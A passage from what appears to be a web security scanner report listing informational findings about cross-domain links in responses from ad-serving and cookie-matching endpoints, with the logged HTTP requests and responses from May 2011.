<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://adx.adnxs.com/mapuid?member=181&amp;user=CAESEAYDROJIBlXAxjjwOAYYXzI&amp;cver=1">here</A>
...[SNIP]...
13.38. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=mediamath HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTWpsRk5ETkVPRVl0TlRKRE5TMDBRemRDTFVJeVJVRXRNREU0TVRRNU5rVTJOamN4L05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NDAwNDk4MTEwMzk2MTYzNS8xMTUwMDMvMTAwNDcwLzMvUTNBbV9DbnBmUVVnTncyOVZSNGhUbWpqa0w0WkZVdDFnbUFFWWRJanE0RS8/HmZsFV1ZVDb6VABVBJjTE0kobiw&price=3.5500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://sync.mathtag.com/sync/img?mt_exid=4&mt_ec=64ws&mt_exuid=CAESEI7AtohZAB1uVQGOsNXUkdI&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:31:34 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 306
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://sync.mathtag.com/sync/img?mt_exid=4&amp;mt_ec=64ws&amp;mt_exuid=CAESEI7AtohZAB1uVQGOsNXUkdI&amp;cver=1">here</A>
...[SNIP]...
13.39. http://cm.npc-gatehouse.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-gatehouse.overture.com
Path:   /js_1_0/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js_1_0/?config=5970914500&type=news&keywordCharEnc=utf8&mkt=us&source=npc_gatehouse_mysuburbanlife_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th&outputCharEnc=utf8&tg=1&bc=dbdbdb&cc=ffffff&lc=000000&tc=666666&uc=666666&du=1&cb=1305207048874&ctxtContent=%3Chead%3E%0A%09%09%0A%09%09%09%3Cbase%20href%3D%22http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%22%3E%0A%09%09%0A%09%09%0A%09%09%09%3Ctitle%3ETo%20do%20tonight%3A%20Watch%20'American%20Idol'%3B%20%22Priest%22%20opens%20Friday%20the%2013th%20%20-%20Lyons%2C%20IL%20-%20Lyons%20Suburban%20Life%3C%2Ftitle%3E%0A%09%09%0A%09%09%0A%09%09%3Cmeta%20content%3D%22Lyons%20Suburban%20Life%20-%20%0A%09Your%20daily%20entertainment%20update%20with%20items%20on%20%26amp%3Bquot%3BAmerican%20Idol%26amp%3Bquot%3B%20tonight%20on%20Fox%2C%20%26amp%3Bquot%3BPriest%26amp%3Bquot%3B%20opening%20on%20Friday%20the%2013th%20and%20a%20recipe%20 HTTP/1.1
Host: cm.npc-gatehouse.overture.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1; UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczEwNzU1MACxpU6ww=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczE7ygI5tUAA1eCw==; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sun, 09-May-2021 13:32:13 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4749


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<div style="overflow:hidden; height:14px;"><a href="http://info.yahoo.com/services/us/yahoo/ads/details.html" target="_blank" class="title">Ads by Yahoo!</a>
...[SNIP]...
13.40. http://cm.npc-scripps.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-scripps.overture.com
Path:   /js_1_0/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /js_1_0/?config=7894763060&type=entertainment&ctxtId=entertainment&keywordCharEnc=utf8&source=npc_scripps_courierpress_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&css_url=http://media.scrippsnewspapers.com/yahoo/yahoo_cm.css&du=1&cb=1305207046691&ctxtContent=%3C!--%0A%20%20%0A%20%20%20%20%0A%20%20%20%20ROLE%20%3D%20prod.%0A--%3E%3Chead%3E%0A%09%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09var%20jSINGconf%20%3D%20%7B%7D%3B%0A%09%09%09jSINGconf.theme%20%3D%20%7B%0A%09%09%09%09%0A%09%09%09%09%09CITY%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press'%2C%0A%09%09%09%09%0A%09%09%09%09%09VIDEO_MEDIA_URL%3A%20'http%3A%2F%2Fmedia.scrippsnewspapers.com%2Fcorp_assets%2Fasphalt'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_MEDIA_URL%3A%20'http%3A%2F%2Fweb.courierpress.com%2Fstatic%2Fecp%2Fasphalt%2Fprod'%2C%0A%09%09%09%09%0A%09%09%09%09%09REGION%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09MOBILE_SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press%20Mobile'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_URL%3A%20'http%3A%2F%2Fwww HTTP/1.1
Host: cm.npc-scripps.overture.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1; UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDFzcLUwNnC2MAc2BU%2bQw=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczE2MLZxcAA2xUBA0=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sun, 09-May-2021 13:32:07 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</title>

<link rel="stylesheet" href="http://media.scrippsnewspapers.com/yahoo/yahoo_cm.css" type="text/css">
<style type="text/css">
...[SNIP]...
<div style="overflow:hidden; height:14px;"><a href="http://info.yahoo.com/services/us/yahoo/ads/details.html" target="_blank" class="title">Ads by Yahoo!</a>
...[SNIP]...
13.41. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1599446853501333&output=html&h=90&slotname=2030600084&w=728&lmt=1305224372&flash=10.2.154&url=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&dt=1305206926974&bpp=3&shv=r20110427&jsv=r20110427&correlator=1305206927004&frm=0&adk=1993034238&ga_vid=506792354.1305206912&ga_sid=1305206912&ga_hid=1496676679&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1020&bih=950&fu=0&ifi=3&dtd=50&xpc=thxXkajjHQ&p=http%3A//www.gizmodo.com.au HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:29:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4542

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/%26hl%3Den%26client%3Dca-pub-1599446853501333%26adU%3DRegistry-Cleaner.PerformerSoft.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHSVWgOXW7OaLm_Rchc6gD9Od5R3A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
13.42. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3518496391625584&output=html&h=250&slotname=3351414980&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fcrenk.com%2Fbuy-chromebook%2F&dt=1305206944291&bpp=3&shv=r20110427&jsv=r20110427&correlator=1305206944296&frm=1&adk=1891509065&ga_vid=1410490875.1305206944&ga_sid=1305206944&ga_hid=1771882336&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=1696810228&fu=0&ifi=1&dtd=20 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:29:05 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4529

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CK2rvpjhycWKggEQrAIY-gEyCLhWjHbjNKXL">
...[SNIP]...
m%3D1%26sig%3DAGiWqtxB3umqNNpVl5JH7XJ981lTVX3vFg%26utm_source%3Den-oa-na-us-gdn%26utm_medium%3Doa%26client%3Dca-pub-3518496391625584%26adurl%3Dhttp://www.google.com/chromebook%2523utm_campaign%253Den"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CK2rvpjhycWKggEQrAIY-gEyCLhWjHbjNKXL" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBg2CIoeDLTZ3OBJGqsQeit6nyC_Hv74oCqbbAihzAjbcB4LizARABGAEgkY_HGjgAUNCkiNr6_____wFgyYaFiYikhBCgAf31yPYDsgEJY3JlbmsuY29tugEKMzAweDI1MF9hc8gBBNoBIGh0dHA6Ly9jcmVuay5jb20vYnV5LWNocm9tZWJvb2svuAIYqAMB6AP4A-gDigPoA7YC9QMAAADE%26num%3D1%26sig%3DAGiWqtxB3umqNNpVl5JH7XJ981lTVX3vFg%26utm_source%3Den-oa-na-us-gdn%26utm_medium%3Doa%26client%3Dca-pub-3518496391625584%26adurl%3Dhttp://www.google.com/chromebook%2523utm_campaign%253Den" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://crenk.com/buy-chromebook/%26hl%3Den%26client%3Dca-pub-3518496391625584%26adU%3Dgoogle.com/chromebook%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFePyq0o9TT5NZdWGWuPrPKaJs83g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
13.43. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1599446853501333&output=html&h=600&slotname=9938614244&w=160&lmt=1305224372&flash=10.2.154&url=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&dt=1305206961138&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=2030600084%2C2575038140&correlator=1305206927004&frm=0&adk=1834505093&ga_vid=506792354.1305206912&ga_sid=1305206912&ga_hid=1496676679&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=11&dtd=9&xpc=VxMVxJXFMy&p=http%3A//www.gizmodo.com.au HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:29:22 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4774

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="160" HEIGHT="600"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CIH6yNqK85yCVRCgARjYBDIIhQsiKMmID3U">
...[SNIP]...
m%3D1%26sig%3DAGiWqtyOIGfi5cFWQrl04Rtg376rugP7Mg%26utm_source%3Den-oa-na-us-gdn%26utm_medium%3Doa%26client%3Dca-pub-1599446853501333%26adurl%3Dhttp://www.google.com/chromebook%2523utm_campaign%253Den"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CIH6yNqK85yCVRCgARjYBDIIhQsiKMmID3U" id="google_flash_embed" WIDTH="160" HEIGHT="600" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB5yzPseDLTcClN5CrsQfN__XLCPHv74oCobfAihzAjbcBgIFTEAEYASDd-cUZOABQ0KSI2vr_____AWDJhoWJiKSEEKAB_fXI9gOyARJ3d3cuZ2l6bW9kby5jb20uYXW6AQoxNjB4NjAwX2FzyAEE2gFaaHR0cDovL3d3dy5naXptb2RvLmNvbS5hdS8yMDExLzA1L2dvb2dsZS1jaHJvbWUtb3MtbGFuZHMtb24taGFyZHdhcmUteW91LWNhbi1hY3R1YWxseS1idXkv4AEDuAIYqAMB6AO2AugD4QHoA-oC6AMF9QMAAADEyAQB%26num%3D1%26sig%3DAGiWqtyOIGfi5cFWQrl04Rtg376rugP7Mg%26utm_source%3Den-oa-na-us-gdn%26utm_medium%3Doa%26client%3Dca-pub-1599446853501333%26adurl%3Dhttp://www.google.com/chromebook%2523utm_campaign%253Den" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/%26hl%3Den%26client%3Dca-pub-1599446853501333%26adU%3Dgoogle.com/chromebook%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHNXFRxgOcnNL285f-Rg3IsJKYDCw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
13.44. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1305225037&flash=10.2.154&url=http%3A%2F%2Fwww.greenfieldreporter.com%2Fview%2Fstory%2F0a19804652d4473789a5eda53a1ed37f%2FUS-Investing-Unlucky-Seven%2F&dt=1305207037540&bpp=4&shv=r20110427&jsv=r20110427&correlator=1305207037587&frm=0&adk=3743901038&ga_vid=1481856502.1305207031&ga_sid=1305207031&ga_hid=723212432&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=950&eid=33895150&fu=0&ifi=3&dtd=387&xpc=2n00OjaWdC&p=http%3A//www.greenfieldreporter.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:32:02 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14914

<!doctype html><html><head><style>a{color:#333333}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/%26hl%3Den%26client%3Dca-pub-8560941387472259%26adU%3Dwww.GonthierGroup.com%26adT%3DSwiss%2BAnnuities%2B%25E2%2584%25A2%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3DTradeSmartU.com/%253FFreeOptionsTrading%26adT%3DOptions%2BTrading%2BClasses%26gl%3DUS&amp;usg=AFQjCNHDK2ZFiz-TDQMJYNI00nz3NNrcLQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
13.45. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

